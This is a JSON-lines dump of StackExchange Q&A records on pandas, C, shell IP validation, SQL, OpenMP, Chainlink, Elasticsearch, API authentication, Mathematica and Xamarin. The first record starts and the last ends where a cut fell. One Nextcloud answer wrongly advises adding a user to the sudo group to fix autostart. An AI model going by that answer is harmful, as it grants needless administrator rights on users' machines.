\"data 9\"]})\n\ndf = df.transpose()\n# remove header\ndf.columns = [\"\" for i in range(len(df.columns))]\n\n# make the index bold - ** ** \ndf.index = [\"**{}**\".format(idx) for idx in df.index]\n# **Project 1** data 1 data 4 data 7\n# **Project 2** data 2 data 5 data 8\n# **Project 3** data 3 data 6 data 9\n\nprint(df.to_markdown())\n#| | | | |\n#|:--------------|:-------|:-------|:-------|\n#| **Project 1** | data 1 | data 4 | data 7 |\n#| **Project 2** | data 2 | data 5 | data 8 |\n#| **Project 3** | data 3 | data 6 | data 9 |\n<\/code>\nWill be like this:\n\nProject 1\ndata 1\ndata 4\ndata 7\n\nProject 2\ndata 2\ndata 5\ndata 8\n\nProject 3\ndata 3\ndata 6\ndata 9\n\nUpdated:\nIn case you want the csv version of the markdown table in your specified format, you can modify the string and save it as a csv file:\n<code>markdown_text = df.to_markdown() # from above code\nmarkdown_csv= markdown_text.replace(\"|\", \",|,\")[1:-1].replace(\",\\n,\",\"\\n\")\nwith open(\"results.csv\", \"w\", encoding=\"utf-8\") as fp:\n fp.write(markdown_csv)\n<\/code>\nThe results will be (you can skip <code>**{}**<\/code>, markdown bold, in case you don't want it - just comment that part of the code):\nComment: Hey Ehsan, this is perfect. Once everything is finished I'll hit the check mark.\n\nI am running into a slight issue. I'm trying to save the new markdown format into an Excel sheet, but the to_markdown() turns the dataframe into a nice big string, which means that I can't save it to an excel sheet. Do you know of any workaround to make this work? If not, I may have to manually add in all of those bars and hyphens, which is half the issue...\nComment: I will update the code - check the updated part (hopefully it will help)\n","meta":{"source":"stackoverflow","title":"How can I turn a dataframe into a markdown vertical table?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Copying 1 variable of 1 type to another variable of another type in C\n\nQuestion: I had an interview yesterday where they had asked me to write a function which accepts 3 arguments,1 source , 1 destination and other the length and this function should copy the value from source to destination based on the length parameter and the types of source and destination could be different.\nCan someone please help me write a generic function ?\nThanks a lot in advance\nComment: Did you have a question?\nComment: Sounds like memcpy: http:\/\/man7.org\/linux\/man-pages\/man3\/memcpy.3.html\nAnswer: You mean <code>memcpy<\/code> (or <code>memmove<\/code>)? :P\nA naive implementation (using bytes):\n<code>int my_memcpy(void *dest, const void *src, size_t len)\n{\n if (dest == NULL || src == NULL || src == dest) return -1;\n if (len == 0) return 0;\n\n char *dest_bytes = dest;\n const char *src_bytes = src;\n for(size_t i = 0; i < len; i++) {\n dest_bytes[i] = src_bytes[i];\n }\n return 0;\n}\n<\/code>\nOne can optimise using <code>uint64_t<\/code> pointers (taking care of the remainder with a <code>char *<\/code>) and loop unrolling to copy more data each iteration of the for loop.\n","meta":{"source":"stackoverflow","title":"Copying 1 variable of 1 type to another variable of another type in C","dup_signals":{}},"subset":"stackexchange"} +{"text":"Nextcloud does do not launch at reboot\/restart session (autostart) in Ubuntu 20.04\n\nQuestion: I want to have Nextcloud start when I open my session. Following the instructions to start applications automatically does not work for me; I have to start Nextcloud manually each time I start my session.\n\nI am using Ubuntu 20.04 and Nextcloud client 2.6.5\nEdit: clicking the option in the Nextcloud Client General Settings did not work\nAnswer: My way to add a program on user session startup is firstly install gnome-tweaks.\n<code>sudo apt install gnome-tweaks\n<\/code>\nThen run it from activity menu, and go top Startup program, click on the + to add a new program, then choose Nextcloud from the list.\nAnswer: It should be under the Nextcloud Client General Settings. Click the box to put a check on the option to \"Launch on System Startup\"\nComment: did not work for me unfortunately\nAnswer: It works, if you do it as root.\nFor me, all I had to do is add the user who started up the system to the sudoers:\n<code>sudo usermod -a -G sudo <user_who_started_the_system>\n<\/code>\nHave a look at: https:\/\/devconnected.com\/how-to-add-user-to-sudoers-on-ubuntu-20-04\nto get some more instructions.\n","meta":{"source":"askubuntu","title":"Nextcloud does do not launch at reboot\/restart session (autostart) in Ubuntu 20.04","dup_signals":{}},"subset":"stackexchange"} +{"text":"Validate an ip in dash (not bash)\n\nQuestion: I am trying to validate an ip address within a dash script. I've found many ways to achieve the same with bash such as in linuxjournal\nBasically what is does is a comparision using this:\n<code>if [[ $ip =~ '^[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}$' ]]; then\n do something\nfi\n<\/code>\nIs there any way to get the same with dash?\nUPDATE: This is the final script that does what I needed:\n<code>#In case RANGE is a network range (cidr notation) it's splitted to every ip from \n# that range, otherwise we just keep the ip\nif echo $RANGE | grep -E -q '^[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\\/[0-9]{1,2}$'; then\n IPS=`prips $RANGE -e ...0,255`\n if [ \"$?\" != \"0\" ] ; then\n echo \"ERROR: Not a valid network range!\"\n exit 1\n fi\nelif echo $RANGE | grep -E -q '^[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}$'; then\n IPS=\"$RANGE\"\nelse\n echo \"$RANGE no is not a valid IP address or network range\"\n exit 1\nfi\n<\/code>\nComment: An IP address is just a 32-bit number. You're asking for dotted-quad notation, but remember that decimal and hex notation are just as valid. `0x1020304` and `16909060` are the same as `188.8.131.52`.\nComment: I only need validation for human error, no one other than me and my coleagues will use this script, so I can choose a notation and stick to that.\nComment: With regard to your final regexp, you might also represent it as something a bit shorter: `^([0-9]{1,3}\\.){3}[0-9]{1,3}\\\/[0-9]{1,2}$`\nComment: You're using a bunch of different external commands, while it is quite possible to do this nice and cleanly using only `dash` builtins. (See my response below if you're curious as to how.)\nAnswer: You can build a <code>case<\/code> statement, although it will be more verbose than a regex. On the other hand, you avoid spawning any external processes, and it might be easier to read and maintain to boot.\n<code>if case $ip in\n # Invalid if it contains any character other than number or dot\n # Invalid if it contains more than three dots\n # Invalid if it contains two adjacent dots\n # Invalid if it begins with a non-number\n # Invalid if it ends with a non-number\n *[!.0-9]* | *.*.*.*.* | *..* | [!0-9]* | *[!0-9] ) false ;;\n # Invalid if it contains a number bigger than 255:\n # 256-259 or 260-299 or 300-999 or four adjacent digits\n *25[6-9]* | *2[6-9][0-9]* | *[3-9][0-9][0-9]* | *[0-9][0-9][0-9][0-9]* ) false;;\n # Verify that it contains three dots\n *.*.*.* ) true ;;\n # Failing that, invalid after all (too few dots)\n *) false ;;\nesac; then\n echo \"$ip\" is valid\nfi\n<\/code>\nNotice the funky use of a <code>case<\/code> statement (returning either true or false) as the condition in an <code>if<\/code> statement.\nThis is slightly stricter than the regex in that it requires each octet to be less than 256.\nComment: I would not love to have to debug a function like that... :\/\nAnswer: Assuming you are happy with the validation string:\n\n$ s='[0-9]\\{1,3\\}'\n$ echo $ip | grep > \/dev\/null \"^$s\\.$s\\.$s\\.$s$\" &&\n echo $ip is valid\n\nNote that this accepts invalid ip addresses like 8220.127.116.11\nTo validate an ip, it's really not convenient to use a regular expression. A relative easy thing to do is:\n\nIFS=. read a b c d << EOF\n$ip\nEOF\n\nif ( for i in a b c d; do\n eval test \\$$i -gt 0 && eval test \\$$i -le 255 || exit 1\n done 2> \/dev\/null )\nthen\n echo $ip is valid\nfi\nComment: Great, the only issue is that I need the -E flag to get the regex evaluated (or using egrep)\nThanks so much\nComment: Extended regular expressions should only be needed if you use s='[0-9]{1,3}'. If you escape the brackets, basic regular expressions should work. (Ah, you made your comment prior to my edit...)\nComment: Also, the redirection thing is a bit weird. Just use `egrep -q \"regex\"` instead.\nComment: @ghoti I've always avoided -q for portability reasons, but just discovered that it is specified in the Open Group spec which is probably portable enough!\nComment: @ghoti On the other hand, grep -q could be considered bloat: http:\/\/harmful.cat-v.org\/cat-v\/\nComment: Whether it's bloat is up for debate. A grep with redirection is guaranteed to traverse every line of input, whereas the `-q` behaviour could be to exit after the first match. Where does one draw the line? Is it better to have a whole 'nuther tool, \"gree\" for example, to Globally search for a RE, then Exit?\nAnswer: Here is a small <code>dash<\/code> shell function which does not use any external commands and that checks if an IPv4 address is valid. It returns true if the address was correctly formatted, false otherwise.\nI've tried to explain the magic in my comments.\n<code>valid_ip() {\n local IP=\"$1\" IFS=\".\" PART # make vars local, get arg, set $IFS\n set -- $IP # split on $IFS, set $1, $2 etc.\n [ \"$#\" != 4 ] && return 1 # BAD: if not 4 parts\n for PART; do # loop over $1, $2 etc.\n case \"$PART\" in\n *[!0-9]*) return 1 # BAD: if $PART contains non-digit\n esac\n [ \"$PART\" -gt 255 ] && return 1 # BAD: if $PART > 255\n done\n return 0 # GOOD: nothing bad found\n}\n<\/code>\nWith this function you can test your IP address, e.g. to abort your script if the IP address is invalid:\n<code>if valid_ip \"$IP\"; then\n echo \"ERROR: IP address '$IP' is invalid\" >&2\n exit 4\nfi\n<\/code>\n","meta":{"source":"stackoverflow","title":"Validate an ip in dash (not bash)","dup_signals":{}},"subset":"stackexchange"} +{"text":"convert multiple MySQL queries into a single query\n\nQuestion: QUERY 1...\n<code>$result = $wpdb->get_results(\"SELECT wp_users.ID,wp_users.user_login,wp_users.user_registered,wp_users.user_email,t.total,t.acc_nums FROM wp_users LEFT JOIN wp_usermeta ON ( wp_users.ID = wp_usermeta.user_id ) left join (SELECT count(*) as total,user_id,Group_concat(account_number) as acc_nums FROM `user_per_bank` group by user_id) as t on t.user_id=wp_users.ID WHERE 1=1 AND ( \n ( \n( wp_usermeta.meta_key = 'wp_capabilities' AND wp_usermeta.meta_value LIKE '%\\\"editor\\\"%' )\n )\n) ORDER BY user_registered DESC\", ARRAY_A);\n<\/code>\nTO BE COMBINED WITH QUERY...\n<code>$out = $wpdb->get_results('SELECT `user_id`, sum(`amount`) as outstanding FROM `assist_trans` LEFT JOIN `wp_users` ON wp_users.id = assist_trans.user_id WHERE `status` IN (0,2,4) GROUP BY assist_trans.user_id ORDER DESC');\n<\/code>\nso that \"$out\" variable can be dropped and I can use \"$result\" instead...\nAnswer: If I've understood your question correctly, you need to make a join from the first query to the second, and have the <code>outstanding<\/code> column in the result set. Something like this should work. It's untested, but it should point you in the right direction if I've made an error.\nThe only changes (besides formatting) are the new join and the additional column in the result set.\n<code>$result = $wpdb->get_results(\"SELECT wp_users.ID,\n wp_users.user_login,\n wp_users.user_registered,\n wp_users.user_email,\n t.total,\n t.acc_nums,\n o.outstanding\n FROM wp_users\n LEFT JOIN wp_usermeta ON ( wp_users.ID = wp_usermeta.user_id )\n LEFT JOIN (\n SELECT count(*) as total,\n user_id,\n Group_concat(account_number) as acc_nums\n FROM `user_per_bank`\n GROUP BY user_id) as t on t.user_id = wp_users.ID\n LEFT JOIN (\n SELECT `user_id`, sum(`amount`) as outstanding\n FROM `assist_trans`\n LEFT JOIN `wp_users` ON wp_users.id = assist_trans.user_id\n WHERE `status` IN (0,2,4)\n GROUP BY assist_trans.user_id) as o ON ( wp_users.ID = o.user_id )\n WHERE 1=1\n AND ( \n ( \n ( wp_usermeta.meta_key = 'wp_capabilities' AND wp_usermeta.meta_value LIKE '%\\\"editor\\\"%' )\n )\n )\n ORDER BY user_registered DESC\",\n ARRAY_A);\n<\/code>\nComment: This is perfect it works like I wanted but can you help me to echo the added column? This is used in a \"foreach ($result as $res) {\" loop so I only need to add the last column now!\nComment: Nevermind I got it working with echo $res['outstanding']; THANK YOU VERY MUCH for your help!\nComment: Sorry, just saw that. Glad it solved your problem (and that you solved your followup problem); thanks for accepting\n","meta":{"source":"stackoverflow","title":"convert multiple MySQL queries into a single query","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to parellalize histogram addition?\n\nQuestion: I have this algoritmo which scans an image and for each pixel p calculates a 256 bins histogram in which values of the pixel inside a patch around p are saved. The algorithm needs to be O(1) so a need to do many histogram addition, I'd like to make the algorithm faster by parallelizing the histogram addition with OpenMP, so I added <code>#pragma omp parallel for<\/code> before each for (just the ones with histogram additions) but it actually makes it 10 times slower. I think i need to create a parallel region outside but I don't understand how.\nAlso, I'm afraid the overhead generated by OpenMP overcomes the speed gained by the parallelization of a 256-for, but I don't know for sure\n<code>for (int i = 0; i < src.rows; i++) {\n for (int j = 0; j < src.cols; j++) {\n if (j == 0)\n { ... }\n else {\n if (j > side\/2) { \/\/ subtract col\n for (int h = 0; h < 256; h++) \/\/ THIS ONE\n histogram[h] -= colHisto[j - (side\/2) - 1][h];\n }\n if (j < src.cols - side\/2) { \/\/ add column\n if (i > side\/2) { \/\/ subtract pixel\n colHisto[j + side\/2][src.at<uchar>(i - side\/2 - 1, j + side\/2)]--;\n }\n if (i < src.rows - side\/2) { \/\/ add pixel\n colHisto[j + side\/2][src.at<uchar>(i + side\/2, j + side\/2)]++;\n }\n\n for (int h = 0; h < 256; h++) \/\/ AND THIS ONE\n histogram[h] += colHisto[j + side\/2][h];\n }\n }\n }\n}\n<\/code>\nComment: A histogram algorithm can never be O(1) since it has to inspect each element of the array at least once. This makes it O(n) where n is the array size (or number of patches). No amount of parallelization can change the time complexity.\nComment: Possible duplicate of [Calculate the histogram with OpenMP](https:\/\/stackoverflow.com\/questions\/21777819\/calculate-the-histogram-with-openmp)\nComment: please forget about the complexity (it's O(1) respect to the patch's radius) it's really irrelevant here i just need to parallelize those 256 loops, but the issue are those outer loops\nComment: Can you add some more detail? How large is a typical input image? How large are the patches? Are you using OpenCV? What is the memory layout of the images? And most important: did you verify your results with optimizations enabled?\nComment: I need to obtain this behaviour with OpenMP:\n```\n#pragma omp parallel private(i,j,me,n)\n{\n #pragma omp single\n {\n for (int i = 0; i < 10; i++) {\n for (int j = 0; j < 10; j++) {\n if (j == 0)\n #pragma omp for\n for (int h = 0; h < 256; h++) \/\/ THIS ONE\n histogram[h] += h2[h];\n }\n }\n }\n }\n}\n```\nComment: Have you looked at the other discussions of OpenMP Histograms on SO, e.g. https:\/\/stackoverflow.com\/questions\/21777819\/calculate-the-histogram-with-openmp? If that doesn't help, please create a [mcve] (read that page very carefully)!\nComment: Well I can't help if you don't provide more details. And just forcing to use openmp won't solve anything.\nAnswer: I actually solved myself by studying OpenMP more here is the code\n<code>#pragma omp parallel\n{\n for (int i = 0; i < src.rows; i++) {\n for (int j = 0; j < src.cols; j++) {\n \/\/ printf(\"%d%d:\", i, j);\n if (j == 0) { ... }\n else {\n #pragma omp single\n { ... }\n\n one = getTickCount();\n #pragma omp for\n for (int h = 0; h < 256; h++)\n histogram[h] += colHisto[j + side \/ 2][h];\n printf(\"histotime = %d\\n\", getTickCount() - one);\n }\n }\n }\n}\n<\/code>\nIt's significantly faster than putting <code>#pragma omp parallel for<\/code> before each loop but still slower than the sequential version\n","meta":{"source":"stackoverflow","title":"How to parellalize histogram addition?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Chainlink Large Responses\n\nQuestion: I run this code from the chainlink documentation but didn't get the image.\n<code>function requestBytes() public returns (bytes32 requestId) {\n address oracle = \"0xc57B33452b4F7BB189bB5AfaE9cc4aBa1f7a4FD8\";\n bytes32 specId = \"7a97ff8493ec406d90621b2531f9251a\";\n uint256 payment = 100000000000000000;\n Chainlink.Request memory req = buildChainlinkRequest(specId, address(this), this.fulfillBytes.selector);\n req.add(\"get\",\"https:\/\/ipfs.io\/ipfs\/QmZgsvrA1o1C8BGCrx6mHTqR1Ui1XqbCrtbMVrRLHtuPVD?filename=big-api-response.json\");\n req.add(\"path\", \"image\");\n return sendChainlinkRequestTo(oracle, req, payment);\n}\n\nevent RequestFulfilled(\n bytes32 indexed requestId,\n bytes indexed data\n);\n\nfunction fulfillBytes(\n bytes32 requestId,\n bytes memory bytesData\n)\n public\n recordChainlinkFulfillment(requestId)\n{\n emit RequestFulfilled(requestId, bytesData);\n data = bytesData;\n url = string(data);\n}\n<\/code>\nComment: where do you get kovan testnet ??\nComment: I tried to deploy rinkeby test network as I don't have the Kovan public testnet.\nComment: I just tried running this example from the docs on Kovan, and it worked fine. Can you try again? Steps I took were compile the project in remix, deploy on kovan, fund with some LINK, execute the request_bytes function, wait 30 secs, then execute the data and image_url getter functions to see the results https:\/\/remix.ethereum.org\/#optimize=false&evmVersion=null&runs=200&version=soljson-v0.8.6+commit.11564f7e.js&url=https:\/\/github.com\/smartcontractkit\/documentation\/blob\/main\/_includes\/samples\/APIRequests\/GenericBigWord.sol\nComment: I deployed the example contract code to the Kovan public testnet using MetaMask. Where were you deploying it to?\nComment: @yamnaiftikhar Can you share the contract address on the Rinkeby testnet as well as the transaction invoking the `requestBytes()` function?\nComment: @PetrHejda here is an example using the same code: https:\/\/kovan.etherscan.io\/tx\/0x1d1fd1385f4eecb9e05ef4bded4282c46f3301716081eb24b3f99349f654102a\nComment: Thank you @Roch. My reason behind asking OP for their tx details is searching for the issue in the actual transaction - such as incorrect `data`, insufficient LINK balance, possibly using a call instead of a tx (if there's no tx hash), ...\nAnswer: Your best bet for troubleshooting job execution issues is to check your oracle contract for any recent transactions within the related block explorer:\n\nIf there are no transactions within your oracle contract during the associated timeframe, this likely means the job run errored out within the Chainlink node. Check your Chainlink node logs (or navigate to the respective job run from within the Chainlink GUI) for more information.\n\nIf there is a recent transaction within your oracle contract during the associated timeframe, but the transaction failed with an <code>out of gas<\/code> exception, you'll need to increase the gas limit of the respective oracle job, as the gas required to write the data that you are requesting exceeds your node's configured limit (typically 500000 gas). You can configure this limit on a per-job basis by adding the <code>gasLimit<\/code> attribute to your <code>ethTx<\/code> job task: https:\/\/docs.chain.link\/chainlink-nodes\/oracle-jobs\/all-tasks#eth-tx-task.\n\nIf there is a recent transaction within your oracle contract during the associated timeframe, but the transaction failed due to some other <code>execution error<\/code>, you may have some logical error in your consumer contract's fulfill function. Check your contract's fulfill function for coding errors, and try again.\n\nI hope that helps!\n","meta":{"source":"stackoverflow","title":"Chainlink Large Responses","dup_signals":{}},"subset":"stackexchange"} +{"text":"Elasticsearch and Fluentd optimisation for log cluster\n\nQuestion: we are using Elasticsearch and Fluentd for Central logging platform. below is our Config details:\nElasticsearch Cluster:\n<code>Master Nodes: 64Gb Ram, 8 CPU, 9 instances\nData Nodes: 64Gb Ram, 8 CPU, 40 instances\nCoordinator Nodes: 64Gb Ram, 8Cpu, 20 instances\n<\/code>\nFluentd: at any given time we have around 1000+ fluentd instances writing logs to Elasticsearch coordinator nodes.\nand on daily basis we create around 700-800 indices and which total to 4K shards on daily basis. and we keep maximum 40K shards on cluster.\nwe started facing performance issue on Fluentd side, where fluentd instances fails to write logs. common issues are :\n<code> 1. read time out\n 2. request time out\n 3. {\"time\":\"2021-07-02\",\"level\":\"warn\",\"message\":\"failed to flush the buffer. retry_time=9 next_retry_seconds=2021-07-02 07:23:08 265795215088800420057\/274877906944000000000 +0000 chunk=\\\"5c61e5fa4909c276a58b2efd158b832d\\\" error_class=Fluent::Plugin::ElasticsearchOutput::RecoverableRequestFailure error=\\\"could not push logs to Elasticsearch cluster ({:host=>\\\\\\\"logs-es-data.internal.tech\\\\\\\", :port=>9200, :scheme=>\\\\\\\"http\\\\\\\"}): [429] {\\\\\\\"error\\\\\\\":{\\\\\\\"root_cause\\\\\\\":[{\\\\\\\"type\\\\\\\":\\\\\\\"circuit_breaking_exception\\\\\\\",\\\\\\\"reason\\\\\\\":\\\\\\\"[parent] Data too large, data for [<http_request>] would be [32274168710\/30gb], which is larger than the limit of [31621696716\/29.4gb], real usage: [32268504992\/30gb], new bytes reserved: [5663718\/5.4mb], usages [request=0\/0b, fielddata=0\/0b, in_flight_requests=17598408008\/16.3gb, model_inference=0\/0b, accounting=0\/0b]\\\\\\\",\\\\\\\"bytes_wanted\\\\\\\":32274168710,\\\\\\\"bytes_limit\\\\\\\":31621696716,\\\\\\\"durability\\\\\\\":\\\\\\\"TRANSIENT\\\\\\\"}],\\\\\\\"type\\\\\\\":\\\\\\\"circuit_breaking_exception\\\\\\\",\\\\\\\"reason\\\\\\\":\\\\\\\"[parent] Data too large, data for [<http_request>] would be [32274168710\/30gb], which is larger than the limit of [31621696716\/29.4gb], real usage: [32268504992\/30gb], new bytes reserved: [5663718\/5.4mb], usages [request=0\/0b, fielddata=0\/0b, in_flight_requests=17598408008\/16.3gb, model_inference=0\/0b, accounting=0\/0b]\\\\\\\",\\\\\\\"bytes_wanted\\\\\\\":32274168710,\\\\\\\"bytes_limit\\\\\\\":31621696716,\\\\\\\"durability\\\\\\\":\\\\\\\"TRANSIENT\\\\\\\"},\\\\\\\"status\\\\\\\":429}\\\"\",\"worker_id\":0}\n<\/code>\nlooking for guidance on this, how we can optimise our Logs cluster?\nComment: Does this answer your question? [\"\\[circuit\\_breaking\\_exception\\] \\[parent\\]\" Data too large, data for \"\\[\\]\" would be error](https:\/\/stackoverflow.com\/questions\/61870751\/circuit-breaking-exception-parent-data-too-large-data-for-http-request)\nComment: @Azeem no, we already have 31Gb heap on server size of 64Gb Ram.\nComment: Could you please share your ElasticSearch configuration? And, what do you mean by \"read timeout\" error?\nAnswer: Well, by the looks of it, you have exhausted your parent circuit breaker limit of 95% of Heap Memory.\nThe error you mentioned has been mentioned in the elasticsearch docs -\n[1]: https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/current\/fix-common-cluster-issues.html#diagnose-circuit-breaker-errors\n. The page also refers to a few steps you can take to Reduce JVM memory pressure, which can be helpful to reduce this error.\nYou can also try increasing this limit to 98%, using the dynamic command -\n<code>PUT \/_cluster\/settings\n{\n \"persistent\" : {\n \"indices.breaker.total.limit\" : \"98%\" \n }\n}\n<\/code>\nBut I would suggest this be performance tested before applying in production.\nSince your request is 30GB, which is a bit too much, for a more reliable solution, I would suggest increasing your log scrapers frequency, so that it makes more frequent posts to ES with smaller-sized data blocks.\n","meta":{"source":"stackoverflow","title":"Elasticsearch and Fluentd optimisation for log cluster","dup_signals":{}},"subset":"stackexchange"} +{"text":"Creating XML from MSSQL\n\nQuestion: How can I create the following XML from MS SQL?\nI've looked and google and cant see for my specific example as below, thanks.\nThis would be from an SQL query using XML PATH in some manner.\n<code><message>\n<header date=\"15\/07\/2016\" userid=\"QUOTEJOB\">\n <schema name=\"TKJobLoaderSchema\" version=\"1.0\" \/>\n <source system=\"\" product=\"\" productversion=\"\" \/>\n <destination system=\"\" product=\"\" productversion=\"\" \/>\n<\/header>\n<body>\n <jobs>\n <job action=\"jmCreate\" company=\"02\" contract=\"QW\" description=\"test job\" job_type=\"02\" priority=\"5\" created_by=\"QUOTEJOB\">\n <job_lines>\n <job_line line_no=\"1\" line_type=\"SOR\" code=\"AQW\" quantity=\"1916.5\" \/>\n <\/job_lines>\n <job_narratives>\n <job_narrative id=\"2\" narrative=\"4678f874-314c-4584-99e3-c69e3af71999\" \/>\n <\/job_narratives>\n <job_property company=\"02\" ref=\"02363\" \/>\n <\/job>\n <\/jobs>\n<\/body>\n<\/message>\n<\/code>\nComment: Create this XML from **what**? This question is unclear.\nComment: Do you want to generate xml from SQL select query?\nComment: Is there any `1:n` nested data in deeper level? This sample looks nested but plain `1:1`...\nComment: Where is the data coming from? table, literals, variables...?\nComment: Hi,sorry ive updated the question. it was to do it from an sql query and make the xml structure as it is above with message as the root, and header and body inside that, each with there attributes and further levels inside. all the examples I can find are where you would have message, then maybe header as repeatable, and no other separate sections. and no I just needs to be as above, no deeper nesting etc\nComment: Please provide SQL schema and example data.\nAnswer: Assuming, that every value is <code>1:1<\/code> your given sample can be created like the following (replace the literals with your actual column names, variables, whatever):\n<code>SELECT {d'2016-07-15'} AS [header\/@date]\n ,'QUOTEJOB' AS [header\/@userid]\n ,'TKJobLoaderSchema' AS [header\/schema\/@name]\n ,'1.0' AS [header\/schema\/@version]\n ,'' AS [header\/source\/@system]\n ,'' AS [header\/source\/@product]\n ,'' AS [header\/source\/@productversion]\n ,'' AS [header\/destination\/@system]\n ,'' AS [header\/destination\/@product]\n ,'' AS [header\/destination\/@productversion]\n ,'jmCreate' AS [body\/jobs\/job\/@action]\n ,'02' AS [body\/jobs\/job\/@company]\n --more attributes of <job>\n ,1 AS [body\/jobs\/job\/job_lines\/job_line\/@line_no]\n --more attributes of <job_line>\n ,2 AS [body\/jobs\/job\/job_narratives\/job_narrative\/@id]\n --more attributes of <job_narrative>\n ,'02' AS [body\/jobs\/job\/job_property\/@company]\n ,'02363' AS [body\/jobs\/job\/job_property\/@ref]\nFOR XML PATH('message')\n<\/code>\nThe result\n<code><message>\n <header date=\"2016-07-15T00:00:00\" userid=\"QUOTEJOB\">\n <schema name=\"TKJobLoaderSchema\" version=\"1.0\" \/>\n <source system=\"\" product=\"\" productversion=\"\" \/>\n <destination system=\"\" product=\"\" productversion=\"\" \/>\n <\/header>\n <body>\n <jobs>\n <job action=\"jmCreate\" company=\"02\">\n <job_lines>\n <job_line line_no=\"1\" \/>\n <\/job_lines>\n <job_narratives>\n <job_narrative id=\"2\" \/>\n <\/job_narratives>\n <job_property company=\"02\" ref=\"02363\" \/>\n <\/job>\n <\/jobs>\n <\/body>\n<\/message>\n<\/code>\nComment: Yes! This is exactly what I needed. Thanks\n","meta":{"source":"stackoverflow","title":"Creating XML from MSSQL","dup_signals":{}},"subset":"stackexchange"} +{"text":"DRY API Authentication Design Between Services\n\nQuestion: I am creating an API service that is going to require authentication. this will be the first part of a project that will include a front-end service for my website, and also open up the api for 3rd party client front-ends to the service.\nI have been planning out how I am going to split my site into the backend\/frontend and think I have come up with a solution where I don't have to have duplicate user tables, but wanted to see if there were any gaping holes in my logic by asking a question here.\nThe auth system is designed to be similar to the Amazon AWS S3 auth system \u2014 assigning each user a key and secret, then using the secret to sign the api requests from the front-end clients. The api then looks up the user from the api_key, verifies that it was signed with the user's api_secret and goes from there.\nThe biggest hurdle is that I want my user model to live in the fronted. This is due to the existing ties between the user, subscription models and payment information that really have no place in the API service. To work with this, when the API needs to lookup a user api_secret, it has to communicate back to my front-end app (over a secure https line, and a different thread) to get it. This picture will help explain that in step 4.\n\nI think that this will provide a secure auth system for the api, and a way for any front-end client or 3rd party client to implement steps 1 and 2, while not duplicating any user data in the backend. Step 4 would still always call my specific front-end app which holds all the user tables.\nIs this a dumb way to do this?\nComment: It does smell of re-inventing the square wheel. What's wrong with sessions and SSL?\nComment: The API is sessionless. Amazon has a pretty good writeup on the auth protocol. I guess I am not really asking about the signature process as much as I am the security of steps 3-5. This comes from me separating the API database from the user database.\nAnswer: Who are you trying to protect? the user? the front-end web? or the API?\nI see one problem in that the API secret is stored on the front-end, which is more likely to be exposed to the outside world. If the front-end is compromised, then anybody can access the backend impersonating the user. It is a likely point to intercept in order to gain access to those secrets, otherwise only known to two parties.\nI'm not sure I understood the point of the user providing the api secret, or whether it was stored on the front-end, and the access was granted by e.g. a username\/password.\nOtherwise, it sounds like you can benefit from using OAUTH to sign requests. OAUTH has a (oddly not very known it seems) two-legged mode, where you can easily exchange signed messages between two entities with a shared key.\nAll and all, looks like either a bit of a confused\/confusing design, or perhaps it's hard to explain without giving more context. Best advice is to try not to reinvent the wheel and use existing algorithms\/solutions\/architectures as much as possible.\nComment: Thanks. I am going with OAuth. I originally passed over it because I thought it needed the webpage callback (three-legged).\nComment: yep, it's easy to miss since it's primarily used in the 3-legged situation by giants like google and twitter. One more tip about OAUTH and APIs - POST\/PUT requests might not be fully 'covered' by oauth, unless you use application\/x-www-form-urlencoded. Typically an API would use application\/json or xml, so pay attention to this. Usually adding SSL is a simple and effective solution with the 2-legged option, but just be aware of it!\n","meta":{"source":"security.stackexchange","title":"DRY API Authentication Design Between Services","dup_signals":{}},"subset":"stackexchange"} +{"text":"List conversion into list containing rules\n\nQuestion: How can I convert the two lists:\n<code>list1 = {1, 2, 3};\nlist2 = {\"One\", \"Two\", \"Three\"};\n<\/code>\ninto a list:\n<code>{1 -> \"One\", 2 -> \"Two\", 3 -> \"Three\"}\n<\/code>\nComment: `Thread[list1 -> list2]`\nAnswer: <code>MapThread[Rule,{list1 ,list2}]\n<\/code>\n","meta":{"source":"mathematica.stackexchange","title":"List conversion into list containing rules","dup_signals":{}},"subset":"stackexchange"} +{"text":"Separate certificates on a local machine for each service\n\nQuestion: I'd like to know if it's possible to have a separate certificate on a local machine, one for a heavy client and the another one for the web browser to be sure the correct client communicate with the web browser. Thanks a lot for your help.\nComment: It's possible, but it wouldn't ensure that the correct client is using the correct certificate. Nor does it ensure that your client is being used to begin with. All a certificate does is prove possession of the private key.\nAnswer: Yes, it is.\nA certificate is simply a file, and so is the corresponding private key. You can place multiple certificates with their private keys on a machine and point each software to a different certificate.\n","meta":{"source":"security.stackexchange","title":"Separate certificates on a local machine for each service","dup_signals":{}},"subset":"stackexchange"} +{"text":"Redefining functions defined in standard libc header files?\n\nQuestion: Is there any <code>gcc<\/code> trick that lets me redefine the signature of <code>libc<\/code> functions (e.g. <code>fsetpos<\/code>) defined in standard headers (e.g. <code>stdio.h<\/code>)? As of now if I do that, I receive duplicate declaration error message.\nComment: Tell us why, so we understand why just declaring and defining e.g. `my_fsetpos` won't do?\nAnswer: Declarations in standard headers are decorated with many additional attributes to help optimizations, improve portability, etc. (and sometimes even defined as macros). If your declaration is even slightly incompatible to those you are guaranteed to get many interesting messages from compiler.\nSo if you try to overload some standard function, do not include standard headers in its file.\n","meta":{"source":"stackoverflow","title":"Redefining functions defined in standard libc header files?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Resources raw folder localize in xamarin.forms\n\nQuestion: I'm Xamarin Developer\nI want to play *.mp3 or *.wav file in the localized application\nso I divided the file like that\n\nand I implement code in dependency service like\n<code> public void OnePlaySound()\n {\n _mediaPlayer = MediaPlayer.Create(context, Resource.Raw.wavone);\n\n _mediaPlayer.Start();\n _mediaPlayer.Completion += delegate\n {\n if (_mediaPlayer != null)\n {\n _mediaPlayer.Stop();\n _mediaPlayer.Release();\n _mediaPlayer = null;\n }\n };\n }\n<\/code>\nbut _mediaPlayer always returns null..\nis there any solution to use the localizing raw files?\nAnswer: I understand from your description that you want to use MediaPlayer to play an audio file in the Resource\/Raw folder using dependencyservice in Xamarin.Forms. Here is an example:\nFirst, create interface named IPlayAudio in .Net standard library project(shared code).\n<code>public interface 